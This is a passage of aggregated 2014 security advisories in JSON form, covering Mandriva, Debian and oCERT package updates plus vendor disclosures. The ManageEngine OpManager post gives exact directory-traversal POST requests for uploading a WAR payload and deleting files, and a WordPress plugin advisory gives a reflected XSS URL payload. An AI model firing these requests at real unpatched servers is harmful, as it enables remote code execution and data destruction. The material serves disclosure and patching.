mbs1/x86_64/zarafa-7.1.8-1.1.mbs1.x86_64.rpm\r\n 6e19f61e06ea0636e60457557217780e mbs1/x86_64/zarafa-archiver-7.1.8-1.1.mbs1.x86_64.rpm\r\n dd43d8a343ca593d19c38bfd99b4a933 mbs1/x86_64/zarafa-caldav-7.1.8-1.1.mbs1.x86_64.rpm\r\n 07caaec38f12734fa485ec5ac58108f2 mbs1/x86_64/zarafa-client-7.1.8-1.1.mbs1.x86_64.rpm\r\n 8201924f8a2021a34bf74ccfd6ec576f mbs1/x86_64/zarafa-common-7.1.8-1.1.mbs1.x86_64.rpm\r\n 066260bb283e280e1d2674047816b30b mbs1/x86_64/zarafa-dagent-7.1.8-1.1.mbs1.x86_64.rpm\r\n e583d4796a6d98723b4f18bca47744b3 mbs1/x86_64/zarafa-gateway-7.1.8-1.1.mbs1.x86_64.rpm\r\n 8b41c886437edce1eb583b91a43971f8 mbs1/x86_64/zarafa-ical-7.1.8-1.1.mbs1.x86_64.rpm\r\n 1347c9d77b5ea8a72ddc13cb94ddb3c1 mbs1/x86_64/zarafa-indexer-7.1.8-1.1.mbs1.x86_64.rpm\r\n 581ffb74503a3303782a10935ccc27e0 mbs1/x86_64/zarafa-monitor-7.1.8-1.1.mbs1.x86_64.rpm\r\n ee7a4afd5c4d9a13bc63922555c507e7 mbs1/x86_64/zarafa-server-7.1.8-1.1.mbs1.x86_64.rpm\r\n 415c6fac59aff2dbfbe61087242d1aa6 mbs1/x86_64/zarafa-spooler-7.1.8-1.1.mbs1.x86_64.rpm\r\n 1c3d37d1beea23d73b84fd76bce47fdc mbs1/x86_64/zarafa-utils-7.1.8-1.1.mbs1.x86_64.rpm\r\n d31a060121669abda9d720f4991094bf mbs1/x86_64/zarafa-webaccess-7.1.8-1.1.mbs1.noarch.rpm \r\n 00d2043f190032f6a624e0721d29242f mbs1/SRPMS/zarafa-7.1.8-1.1.mbs1.src.rpm\r\n _______________________________________________________________________\r\n\r\n To upgrade automatically use MandrivaUpdate or urpmi. The verification\r\n of md5 checksums and GPG signatures is performed automatically for you.\r\n\r\n All packages are signed by Mandriva for security. You can obtain the\r\n GPG public key of the Mandriva Security Team by executing:\r\n\r\n gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98\r\n\r\n You can view other update advisories for Mandriva Linux at:\r\n\r\n http://www.mandriva.com/en/support/security/advisories/\r\n\r\n If you want to report vulnerabilities, please contact\r\n\r\n security_(at)_mandriva.com\r\n _______________________________________________________________________\r\n\r\n Type Bits/KeyID Date User ID\r\n pub 1024D/22458A98 2000-07-10 Mandriva Security Team\r\n <security*mandriva.com>\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: GnuPG v1.4.12 (GNU/Linux)\r\n\r\niD8DBQFUIs4hmqjQ0CJFipgRAvRCAJ4wDpxAVuBlFOSSzqskGMG6pKHOzACcDNzl\r\n52oiDTAmeLxW4yTgFVIANrM=\r\n=/D7b\r\n-----END PGP SIGNATURE-----\r\n\r\n", "edition": 1, "modified": "2014-10-14T00:00:00", "published": "2014-10-14T00:00:00", "id": "SECURITYVULNS:DOC:31201", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:31201", "title": "[ MDVSA-2014:182 ] zarafa", "type": "securityvulns", "cvss": {"score": 2.1, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2018-08-31T11:10:54", "description": "\r\n\r\n-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\n _______________________________________________________________________\r\n\r\n Mandriva Linux Security Advisory MDVSA-2014:143\r\n http://www.mandriva.com/en/support/security/\r\n _______________________________________________________________________\r\n\r\n Package : phpmyadmin\r\n Date : July 30, 2014\r\n Affected: Business Server 1.0\r\n _______________________________________________________________________\r\n\r\n Problem Description:\r\n\r\n Multiple vulnerabilities has been discovered and corrected in\r\n phpmyadmin:\r\n \r\n Cross-site scripting (XSS) vulnerability in the\r\n PMA_getHtmlForActionLinks function in libraries/structure.lib.php in\r\n phpMyAdmin 4.2.x before 4.2.6 allows remote authenticated users to\r\n inject arbitrary web script or HTML via a crafted table comment that\r\n is improperly handled during construction of a database structure page\r\n (CVE-2014-4954).\r\n \r\n Cross-site scripting (XSS) vulnerability in the PMA_TRI_getRowForList\r\n function in libraries/rte/rte_list.lib.php in phpMyAdmin 4.0.x before\r\n 4.0.10.1, 4.1.x before 4.1.14.2, and 4.2.x before 4.2.6 allows remote\r\n authenticated users to inject arbitrary web script or HTML via a\r\n crafted trigger name that is improperly handled on the database\r\n triggers page (CVE-2014-4955).\r\n \r\n Multiple cross-site scripting (XSS) vulnerabilities in js/functions.js\r\n in phpMyAdmin 4.0.x before 4.0.10.1, 4.1.x before 4.1.14.2, and 4.2.x\r\n before 4.2.6 allow remote authenticated users to inject arbitrary web\r\n script or HTML via a crafted (1) table name or (2) column name that is\r\n improperly handled during construction of an AJAX confirmation message\r\n (CVE-2014-4986).\r\n \r\n server_user_groups.php in phpMyAdmin 4.1.x before 4.1.14.2 and 4.2.x\r\n before 4.2.6 allows remote authenticated users to bypass intended\r\n access restrictions and read the MySQL user list via a viewUsers\r\n request (CVE-2014-4987).\r\n \r\n This upgrade provides the latest phpmyadmin version (4.2.6) to address\r\n these vulnerabilities.\r\n _______________________________________________________________________\r\n\r\n References:\r\n\r\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-4954\r\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-4955\r\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-4986\r\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-4987\r\n http://sourceforge.net/p/phpmyadmin/news/\r\n http://www.phpmyadmin.net/home_page/security/PMASA-2014-4.php\r\n http://www.phpmyadmin.net/home_page/security/PMASA-2014-5.php\r\n http://www.phpmyadmin.net/home_page/security/PMASA-2014-6.php\r\n http://www.phpmyadmin.net/home_page/security/PMASA-2014-7.php\r\n _______________________________________________________________________\r\n\r\n Updated Packages:\r\n\r\n Mandriva Business Server 1/X86_64:\r\n c38d242b5ef43c67383c413ee264c7ee mbs1/x86_64/phpmyadmin-4.2.6-1.mbs1.noarch.rpm \r\n 791e5933c8a096bfff2afa12bf3cd6a5 mbs1/SRPMS/phpmyadmin-4.2.6-1.mbs1.src.rpm\r\n _______________________________________________________________________\r\n\r\n To upgrade automatically use MandrivaUpdate or urpmi. The verification\r\n of md5 checksums and GPG signatures is performed automatically for you.\r\n\r\n All packages are signed by Mandriva for security. You can obtain the\r\n GPG public key of the Mandriva Security Team by executing:\r\n\r\n gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98\r\n\r\n You can view other update advisories for Mandriva Linux at:\r\n\r\n http://www.mandriva.com/en/support/security/advisories/\r\n\r\n If you want to report vulnerabilities, please contact\r\n\r\n security_(at)_mandriva.com\r\n _______________________________________________________________________\r\n\r\n Type Bits/KeyID Date User ID\r\n pub 1024D/22458A98 2000-07-10 Mandriva Security Team\r\n <security*mandriva.com>\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: GnuPG v1.4.12 (GNU/Linux)\r\n\r\niD8DBQFT2LsEmqjQ0CJFipgRAuZEAJ9i3hrsGpz9nUuG3Cb1kdOrx5nU1gCg2z8e\r\n8mLBij7tNkEf/x0VnnkTFGo=\r\n=tSKY\r\n-----END PGP SIGNATURE-----\r\n\r\n", "edition": 1, "cvss3": {}, "published": "2014-10-14T00:00:00", "title": "[ MDVSA-2014:143 ] phpmyadmin", "type": "securityvulns", "bulletinFamily": "software", "cvss2": {}, "cvelist": ["CVE-2014-4954", "CVE-2014-4986", "CVE-2014-4955", "CVE-2014-4987"], "modified": "2014-10-14T00:00:00", "id": "SECURITYVULNS:DOC:31182", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:31182", "cvss": {"score": 4.0, "vector": "AV:NETWORK/AC:LOW/Au:SINGLE_INSTANCE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2018-08-31T11:10:54", "description": "\r\n\r\nHi,\r\n\r\nThis is the fifth part of the ManageOwnage series. For previous parts, see:\r\nhttp://seclists.org/fulldisclosure/2014/Aug/55\r\nhttp://seclists.org/fulldisclosure/2014/Aug/75\r\nhttp://seclists.org/fulldisclosure/2014/Aug/88\r\nhttp://seclists.org/fulldisclosure/2014/Sep/1\r\n\r\nThis time we have a file upload with directory traversal as well as an\r\narbitrary file deletion vulnerability. The file upload can be abused\r\nto deliver a WAR payload in the Tomcat webapps directory, which will\r\ndeploy a malicious Servlet allowing the attacker to execute arbitrary\r\ncode.\r\n\r\nDetails are below, and the usual Metasploit module has been submitted\r\nand should be available soon (see pull request\r\nhttps://github.com/rapid7/metasploit-framework/pull/3903).\r\n\r\n\r\n>> Multiple vulnerabilities in ManageEngine OpManager, Social IT Plus and IT360\r\n>> Discovered by Pedro Ribeiro (pedrib@gmail.com), Agile Information Security\r\n==========================================================================\r\n\r\n>> Background on the affected products:\r\n"ManageEngine OpManager is a network and data center infrastructure\r\nmanagement software that helps large enterprises, service providers\r\nand SMEs manage their data centers and IT infrastructure efficiently\r\nand cost effectively. Automated workflows, intelligent alerting\r\nengines, configurable discovery rules, and extendable templates enable\r\nIT teams to setup a 24x7 monitoring system within hours of\r\ninstallation."\r\n\r\n"Social IT Plus offers a cascading wall that helps IT folks to start\r\ndiscussions, share articles and videos easily and quickly. Other team\r\nmembers can access it and post comments and likes on the fly."\r\n\r\n"Managing mission critical business applications is now made easy\r\nthrough ManageEngine IT360. With agentless monitoring methodology,\r\nmonitor your applications, servers and databases with ease. Agentless\r\nmonitoring of your business applications enables you high ROI and low\r\nTOC. With integrated network monitoring and bandwidth utilization,\r\nquickly troubleshoot any performance related issue with your network\r\nand assign issues automatically with ITIL based ServiceDesk\r\nintegration."\r\n\r\n\r\n>> Technical details:\r\n#1\r\nVulnerability: Remote code execution via WAR file upload\r\nConstraints: unauthenticated on OpManager and Social IT; authenticated in IT360\r\n\r\na)\r\nCVE-2014-6034\r\nPOST /servlet/com.me.opmanager.extranet.remote.communication.fw.fe.FileCollector?regionID=../../../tomcat/webapps&FILENAME=payload.war\r\nAffected versions: OpManager v8.8 to v11.3; Social IT Plus v11.0;\r\nIT360 v? to v10.4\r\nA Metasploit module that exploits this vulnerability has been released.\r\n\r\nb)\r\nCVE-2014-6035\r\nPOST /servlets/FileCollector?AGENTKEY=123&FILENAME=../../../tomcat/webapps/warfile.war\r\nAffected versions: OpManager v? to v11.3\r\n\r\n\r\n#2\r\nVulnerability: Arbitrary file deletion\r\nCVE-2014-6036\r\nConstraints: unauthenticated on OpManager and Social IT; authenticated in IT360\r\nAffected versions: OpManager v? to v11.3; Social IT Plus v11.0; IT360\r\nv? to v10.4\r\n\r\nPOST /servlets/multipartRequest?customIcon=delete&fileName=../../../../boot.ini\r\n\r\n\r\n>> Fix:\r\nUpgrade to OpManager 11.3, then install the patch in\r\nhttps://support.zoho.com/portal/manageengine/helpcenter/articles/servlet-vulnerability-fix\r\nThis patch can be applied to all the applications but only for the\r\nlatest version of each (OpManager 11.3, Social IT 11.0, IT360 10.4).\r\nManageEngine have indicated that the soon to be released OpManager\r\nversion 11.4 might not have the fix as the release is almost ready.\r\nThey are planning to include the fix in OpManager version 11.5 which\r\nshould be released sometime in late November or December 2014. No\r\nindication was given for when fixed versions of IT360 and Social IT\r\nPlus will be released.\r\n\r\nA copy of the advisory above can be found at my repo:\r\nhttps://raw.githubusercontent.com/pedrib/PoC/master/ManageEngine/me_opmanager_socialit_it360.txt\r\n\r\nRegards,\r\nPedro\r\n\r\n", "edition": 1, "cvss3": {}, "published": "2014-10-14T00:00:00", "title": "[The ManageOwnage Series, part V]: RCE / file upload / arbitrary file deletion in OpManager, Social IT and IT360", "type": "securityvulns", "bulletinFamily": "software", "cvss2": {}, "cvelist": ["CVE-2014-6035", "CVE-2014-6034", "CVE-2014-6036"], "modified": "2014-10-14T00:00:00", "id": "SECURITYVULNS:DOC:31197", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:31197", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-08-31T11:10:54", "description": "\r\n\r\n-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\n- -------------------------------------------------------------------------\r\nDebian Security Advisory DSA-3030-1 security@debian.org\r\nhttp://www.debian.org/security/ Moritz Muehlenhoff\r\nSeptember 20, 2014 http://www.debian.org/security/faq\r\n- -------------------------------------------------------------------------\r\n\r\nPackage : mantis\r\nCVE ID : CVE-2014-1608 CVE-2014-1609\r\n\r\nMultiple SQL injection vulnerabilities have been discovered in the Mantis\r\nbug tracking system.\r\n\r\nFor the stable distribution (wheezy), these problems have been fixed in\r\nversion 1.2.11-1.2+deb7u1.\r\n\r\nWe recommend that you upgrade your mantis packages.\r\n\r\nFurther information about Debian Security Advisories, how to apply\r\nthese updates to your system and frequently asked questions can be\r\nfound at: https://www.debian.org/security/\r\n\r\nMailing list: debian-security-announce@lists.debian.org\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: GnuPG v1\r\n\r\niQIcBAEBAgAGBQJUHfCtAAoJEBDCk7bDfE42hG4QAIC7xRXp8yhXEsCAquJrlZDe\r\nIytqw1cll+sfCCZVR4OojdvV9TzenjKyLeYof9XwcAS2odnYFjm9ZvKp+oDNMFfX\r\ndhVAaztU9UJDdGkG6VFBPfkC6gggL2ljQWzHDMF7bc+eKHDV+tys6/7Rhb4OHRKI\r\niT7YK+9ghGzrCKfbJpWUbaefchv39P4S2L195flF8zDSDA4y6jhrt/Tob+H4aKUK\r\nXVLfsI+wKlizBsAK6Ycq8oXbOBs5coiLSSTPoy7Cs0JygBFhqwlY0PbKH5TNcipT\r\nF6nBDHWGfCmjCIOGeL+YbKHKTcCCiS2mFshlfNcO+0HXkYILT6OqctRqjWWL8Ow/\r\n4seEWdCMgVD9JFLbUHaVTnZKSlbKmSeKtTVrB34nJJIt/m484KivXGRPBKtZMPCU\r\njQSeALvdFEf/icwGtncmnruu181E8C2XSm1nx8f5V/11aBdTNZ/NSPz+rSRvOyea\r\nvPOdPtEvL3UNnLcaj4EPMr4KPCOn4WsfW4BKHOda+hLSOsz0/vu+ZU1mFMSdhOk6\r\nbzSPgwNIQmYSlbJsJQQSQNok7w+peIiVKh5FAqFea98gUOPAU+a3hd3LmOmxoqBa\r\nQIFY0uBIssXJbVXKZbnN5ytU9sJoZOL6YXVONUxqS2KfAHUZ4lmpyvBLlG4PxHoT\r\nZeYs5kq49357vZ/Ksnoq\r\n=GhoP\r\n-----END PGP SIGNATURE-----\r\n\r\n", "edition": 1, "cvss3": {}, "published": "2014-10-14T00:00:00", "title": "[SECURITY] [DSA 3030-1] mantis security update", "type": "securityvulns", "bulletinFamily": "software", "cvss2": {}, "cvelist": ["CVE-2014-1608", "CVE-2014-1609"], "modified": "2014-10-14T00:00:00", "id": "SECURITYVULNS:DOC:31210", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:31210", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-08-31T11:10:50", "description": "\r\n\r\n\r\n#2014-001 MantisBT input sanitization errors\r\n\r\nDescription:\r\n\r\nThe MantisBT web-based bugtracking system suffers from SQL injection\r\nvulnerabilities caused by insufficient input sanitization.\r\n\r\nThe MantisBT SOAP API uses the unsafe db_query() function allowing a\r\nspecially crafted tag within the envelope of a mc_issue_attachment_get SOAP\r\nrequest to inject arbitrary SQL queries.\r\n\r\nThe reporting of this specific issue was followed by an investigation that\r\nlead to additional cases of unsafe db_query() function use, being found by\r\nMantisBT maintainers, throughout MantisBT code.\r\n\r\nAffected version:\r\n\r\nMantisBT >= 1.1.0a4, <= 1.2.15\r\n\r\nFixed version:\r\n\r\nMantisBT >= 1.2.16\r\n\r\nCredit: vulnerability report received from Martin Herfurt <martin.herfurt AT\r\nnruns.com>.\r\n\r\nCVE: CVE-2014-1608 (SOAP), CVE-2014-1609 (additional SQL injections)\r\n\r\nTimeline:\r\n\r\n2014-01-17: vulnerability report received\r\n2014-01-17: contacted MantisBT maintainer\r\n2014-01-17: maintainer provides patch for review\r\n2014-01-18: contacted affected vendors\r\n2014-01-19: assigned CVEs\r\n2014-02-08: MantisBT 1.2.16 released\r\n2014-02-08: advisory release\r\n\r\nReferences:\r\nhttp://www.mantisbt.org\r\nhttp://www.mantisbt.org/bugs/view.php?id=16879\r\nhttp://www.mantisbt.org/bugs/view.php?id=16880\r\nhttp://github.com/mantisbt/mantisbt/commit/00b4c17088fa56594d85fe46b6c6057bb3421102\r\nhttp://github.com/mantisbt/mantisbt/commit/7efe0175f0853e18ebfacedfd2374c4179028b3f\r\n\r\nPermalink:\r\nhttp://www.ocert.org/advisories/ocert-2014-001.html\r\n\r\n-- Andrea Barisani | Founder & Project Coordinator oCERT | OSS Computer Security Incident Response Team <lcars@ocert.org> http://www.ocert.org 0x864C9B9E 0A76 074A 02CD E989 CE7F AC3F DA47 578E 864C 9B9E "Pluralitas non est ponenda sine necessitate"\r\n", "edition": 1, "cvss3": {}, "published": "2014-02-11T00:00:00", "title": "[oCERT-2014-001] MantisBT input sanitization errors", "type": "securityvulns", "bulletinFamily": "software", "cvss2": {}, "cvelist": ["CVE-2014-1608", "CVE-2014-1609"], "modified": "2014-02-11T00:00:00", "id": "SECURITYVULNS:DOC:30305", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:30305", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-08-31T11:10:54", "description": "\r\n\r\n-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\n _______________________________________________________________________\r\n\r\n Mandriva Linux Security Advisory MDVSA-2014:164\r\n http://www.mandriva.com/en/support/security/\r\n _______________________________________________________________________\r\n\r\n Package : phpmyadmin\r\n Date : September 2, 2014\r\n Affected: Business Server 1.0\r\n _______________________________________________________________________\r\n\r\n Problem Description:\r\n\r\n Updated phpmyadmin package fixes security vulnerabilities:\r\n \r\n In phpMyAdmin before 4.1.14.3, multiple XSS vulnerabilities exist in\r\n browse table, ENUM editor, monitor, query charts and table relations\r\n pages (CVE-2014-5273).\r\n \r\n In phpMyAdmin before 4.1.14.3, with a crafted view name it is possible\r\n to trigger an XSS when dropping the view in view operation page\r\n (CVE-2014-5274).\r\n _______________________________________________________________________\r\n\r\n References:\r\n\r\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-5273\r\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-5274\r\n http://advisories.mageia.org/MGASA-2014-0344.html\r\n _______________________________________________________________________\r\n\r\n Updated Packages:\r\n\r\n Mandriva Business Server 1/X86_64:\r\n 34a7b3fb7ca2ba11ed81c8371654783b mbs1/x86_64/phpmyadmin-4.2.8-1.mbs1.noarch.rpm \r\n d1e257a0a057e471cea8142b7abe7b5b mbs1/SRPMS/phpmyadmin-4.2.8-1.mbs1.src.rpm\r\n _______________________________________________________________________\r\n\r\n To upgrade automatically use MandrivaUpdate or urpmi. The verification\r\n of md5 checksums and GPG signatures is performed automatically for you.\r\n\r\n All packages are signed by Mandriva for security. You can obtain the\r\n GPG public key of the Mandriva Security Team by executing:\r\n\r\n gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98\r\n\r\n You can view other update advisories for Mandriva Linux at:\r\n\r\n http://www.mandriva.com/en/support/security/advisories/\r\n\r\n If you want to report vulnerabilities, please contact\r\n\r\n security_(at)_mandriva.com\r\n _______________________________________________________________________\r\n\r\n Type Bits/KeyID Date User ID\r\n pub 1024D/22458A98 2000-07-10 Mandriva Security Team\r\n <security*mandriva.com>\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: GnuPG v1.4.12 (GNU/Linux)\r\n\r\niD8DBQFUBa03mqjQ0CJFipgRAiQNAKDvpJ3eEz3iBPVWBmy3u8owfHnHVQCfT+He\r\nIeSBTdAtN/fXKAuchCOhl8A=\r\n=R82I\r\n-----END PGP SIGNATURE-----\r\n\r\n", "edition": 1, "cvss3": {}, "published": "2014-10-14T00:00:00", "title": "[ MDVSA-2014:164 ] phpmyadmin", "type": "securityvulns", "bulletinFamily": "software", "cvss2": {}, "cvelist": ["CVE-2014-5273", "CVE-2014-5274"], "modified": "2014-10-14T00:00:00", "id": "SECURITYVULNS:DOC:31183", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:31183", "cvss": {"score": 3.5, "vector": "AV:NETWORK/AC:MEDIUM/Au:SINGLE_INSTANCE/C:NONE/I:PARTIAL/A:NONE/"}}, {"lastseen": "2018-08-31T11:10:54", "description": "\r\n\r\n-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\n _______________________________________________________________________\r\n\r\n Mandriva Linux Security Advisory MDVSA-2014:126\r\n http://www.mandriva.com/en/support/security/\r\n _______________________________________________________________________\r\n\r\n Package : phpmyadmin\r\n Date : July 8, 2014\r\n Affected: Business Server 1.0\r\n _______________________________________________________________________\r\n\r\n Problem Description:\r\n\r\n Multiple vulnerabilities has been discovered and corrected in\r\n phpmyadmin:\r\n \r\n Multiple cross-site scripting (XSS) vulnerabilities in phpMyAdmin 4.2.x\r\n before 4.2.4 allow remote authenticated users to inject arbitrary web\r\n script or HTML via a crafted (1) database name or (2) table name that\r\n is improperly handled after presence in (a) the favorite list or (b)\r\n recent tables (CVE-2014-4348).\r\n \r\n Multiple cross-site scripting (XSS) vulnerabilities in phpMyAdmin 4.1.x\r\n before 4.1.14.1 and 4.2.x before 4.2.4 allow remote authenticated\r\n users to inject arbitrary web script or HTML via a crafted table\r\n name that is improperly handled after a (1) hide or (2) unhide action\r\n (CVE-2014-4349).\r\n \r\n This upgrade provides the latest phpmyadmin version (4.2.5) to address\r\n these vulnerabilities.\r\n _______________________________________________________________________\r\n\r\n References:\r\n\r\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-4348\r\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-4349\r\n http://sourceforge.net/p/phpmyadmin/news/\r\n http://www.phpmyadmin.net/home_page/security/PMASA-2014-2.php\r\n http://www.phpmyadmin.net/home_page/security/PMASA-2014-3.php\r\n _______________________________________________________________________\r\n\r\n Updated Packages:\r\n\r\n Mandriva Business Server 1/X86_64:\r\n 94dcec5bc68487ebb9e27567f290257d mbs1/x86_64/phpmyadmin-4.2.5-1.mbs1.noarch.rpm \r\n e4603acd4aaabb0127bdd9cb763d1bc5 mbs1/SRPMS/phpmyadmin-4.2.5-1.mbs1.src.rpm\r\n _______________________________________________________________________\r\n\r\n To upgrade automatically use MandrivaUpdate or urpmi. The verification\r\n of md5 checksums and GPG signatures is performed automatically for you.\r\n\r\n All packages are signed by Mandriva for security. You can obtain the\r\n GPG public key of the Mandriva Security Team by executing:\r\n\r\n gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98\r\n\r\n You can view other update advisories for Mandriva Linux at:\r\n\r\n http://www.mandriva.com/en/support/security/advisories/\r\n\r\n If you want to report vulnerabilities, please contact\r\n\r\n security_(at)_mandriva.com\r\n _______________________________________________________________________\r\n\r\n Type Bits/KeyID Date User ID\r\n pub 1024D/22458A98 2000-07-10 Mandriva Security Team\r\n <security*mandriva.com>\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: GnuPG v1.4.12 (GNU/Linux)\r\n\r\niD8DBQFTu/comqjQ0CJFipgRAkBsAKCH0tOH//7fgAqzbWgcP9SZeiql7wCdEiXC\r\n3BWL3Jy4l4Ty9S/6mF9RjAU=\r\n=BTEz\r\n-----END PGP SIGNATURE-----\r\n\r\n", "edition": 1, "cvss3": {}, "published": "2014-10-14T00:00:00", "title": "[ MDVSA-2014:126 ] phpmyadmin", "type": "securityvulns", "bulletinFamily": "software", "cvss2": {}, "cvelist": ["CVE-2014-4348", "CVE-2014-4349"], "modified": "2014-10-14T00:00:00", "id": "SECURITYVULNS:DOC:31181", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:31181", "cvss": {"score": 3.5, "vector": "AV:NETWORK/AC:MEDIUM/Au:SINGLE_INSTANCE/C:NONE/I:PARTIAL/A:NONE/"}}, {"lastseen": "2018-08-31T11:10:54", "bulletinFamily": "software", "cvelist": ["CVE-2014-7138"], "description": "\r\n\r\nAdvisory ID: HTB23235\r\nProduct: Google Calendar Events WordPress plugin\r\nVendor: Phil Derksen\r\nVulnerable Version(s): 2.0.1 and probably prior\r\nTested Version: 2.0.1\r\nAdvisory Publication: September 17, 2014 [without technical details]\r\nVendor Notification: September 17, 2014 \r\nVendor Patch: October 7, 2014 \r\nPublic Disclosure: October 8, 2014 \r\nVulnerability Type: Cross-Site Scripting [CWE-79]\r\nCVE Reference: CVE-2014-7138\r\nRisk Level: Low \r\nCVSSv2 Base Score: 2.6 (AV:N/AC:H/Au:N/C:N/I:P/A:N)\r\nSolution Status: Fixed by Vendor\r\nDiscovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ ) \r\n\r\n-----------------------------------------------------------------------------------------------\r\n\r\nAdvisory Details:\r\n\r\nHigh-Tech Bridge Security Research Lab discovered vulnerability in Google Calendar Events WordPress plugin, which can be exploited to perform Cross-Site Scripting (XSS) attacks against administrator of a WordPress website with vulnerable plugin.\r\n\r\n\r\n1) Reflected Cross-Site Scripting (XSS) in Google Calendar Events WordPress Plugin: CVE-2014-7138\r\n\r\nInput passed via the "gce_feed_ids" HTTP GET parameter to "/wp-admin/admin-ajax.php" script is not properly sanitised before being returned to the user. A remote attacker can trick a logged-in administrator to open a specially crafted link and execute arbitrary HTML and script code in browser in context of the vulnerable website.\r\n\r\nThe exploitation example below uses the "alert()" JavaScript function to display "immuniweb" word:\r\n\r\nhttp://wordpress/wp-admin/admin-ajax.php?action=gce_ajax&gce_type=page&gce_feed_ids=%27%22%3E%3Cscript%3Ealert%28/immuniweb/%29;%3C/script%3E\r\n\r\n\r\n\r\n-----------------------------------------------------------------------------------------------\r\n\r\nSolution:\r\n\r\nUpdate to Google Calendar Events 2.0.4\r\n\r\nMore Information:\r\nhttps://github.com/pderksen/WP-Google-Calendar-Events/commit/df1fe1d71f8ce9496cc601c96839c474e49db91d\r\nhttps://github.com/pderksen/WP-Google-Calendar-Events/commit/a701ceeb410bdda9d96c9d3d12104630df5d5b43\r\n\r\n-----------------------------------------------------------------------------------------------\r\n\r\nReferences:\r\n\r\n[1] High-Tech Bridge Advisory HTB23235 - https://www.htbridge.com/advisory/HTB23235 - Reflected Cross-Site Scripting (XSS) in Google Calendar Events WordPress Plugin.\r\n[2] Google Calendar Events WordPress plugin - http://philderksen.com/ - Parses Google Calendar feeds and displays the events as a calendar grid or list on a page, post or widget.\r\n[3] Common Vulnerabilities and Exposures (CVE) - http://cve.mitre.org/ - international in scope and free for public use, CVE\u00ae is a dictionary of publicly known information security vulnerabilities and exposures.\r\n[4] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to developers and security practitioners, CWE is a formal list of software weakness types.\r\n[5] ImmuniWeb\u00ae SaaS - https://www.htbridge.com/immuniweb/ - hybrid of manual web application penetration test and cutting-edge vulnerability scanner available online via a Software-as-a-Service (SaaS) model.\r\n\r\n-----------------------------------------------------------------------------------------------\r\n\r\nDisclaimer: The information provided in this Advisory is provided "as is" and without any warranty of any kind. Details of this Advisory may be updated in order to provide as accurate information as possible. The latest version of the Advisory is available on web page [1] in the References.\r\n\r\n", "edition": 1, "modified": "2014-10-14T00:00:00", "published": "2014-10-14T00:00:00", "id": "SECURITYVULNS:DOC:31164", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:31164", "title": "Reflected Cross-Site Scripting (XSS) in Google Calendar Events WordPress Plugin", "type": "securityvulns", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}}, {"lastseen": "2018-08-31T11:10:54", "bulletinFamily": "software", "cvelist": ["CVE-2014-4958"], "description": "\r\n\r\nAll versions of the popular UI for ASP.NET AJAX RadEditor Control product by Telerik may be affected by a high-risk stored attribute-based cross-site scripting (XSS) vulnerability that is assigned CVE-2014-4958. This WYSIWYG rich text editor is \u201c...what Microsoft chose to use in MSDN, CodePlex, TechNet, MCMS and even as an alternative to the default editor in SharePoint.\u201d\r\n\r\nPersonally tested and confirmed are versions: 2014.1.403.35 (much newer) and 2009.3.1208.20 (much older) using Internet Explorer 8, version 8.0.7601.17514. However, all versions from Telerik at this time may be vulnerable and will continue to be until a patched is released. A workaround may be available.\r\n\r\nMore information on the vulnerability: http://maverickblogging.com/disclosing-cve-2014-4958-stored-attribute-based-cross-site-scripting-xss-vulnerability-in-telerik-ui-for-asp-net-ajax-radeditor-control/\r\n\r\nRemediation: Telerik states: We have applied a patch to the editor that will be delivered with our Q3 edition of the controls that should be released towards the end of October. A blog post on the issue has been published here: http://blogs.telerik.com/blogs/14-09-24/securing-radeditor-content-and-preventing-xss-attacks\r\n\r\nAdditional credit goes to Tyler Hoyle and the rest of my team in CGI Federal\u2019s Emerging Technologies Security Practice for their hard work.\r\n\r\n", "edition": 1, "modified": "2014-10-14T00:00:00", "published": "2014-10-14T00:00:00", "id": "SECURITYVULNS:DOC:31198", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:31198", "title": "CVE-2014-4958: Stored Attribute-Based Cross-Site Scripting (XSS) Vulnerability in Telerik UI for ASP.NET 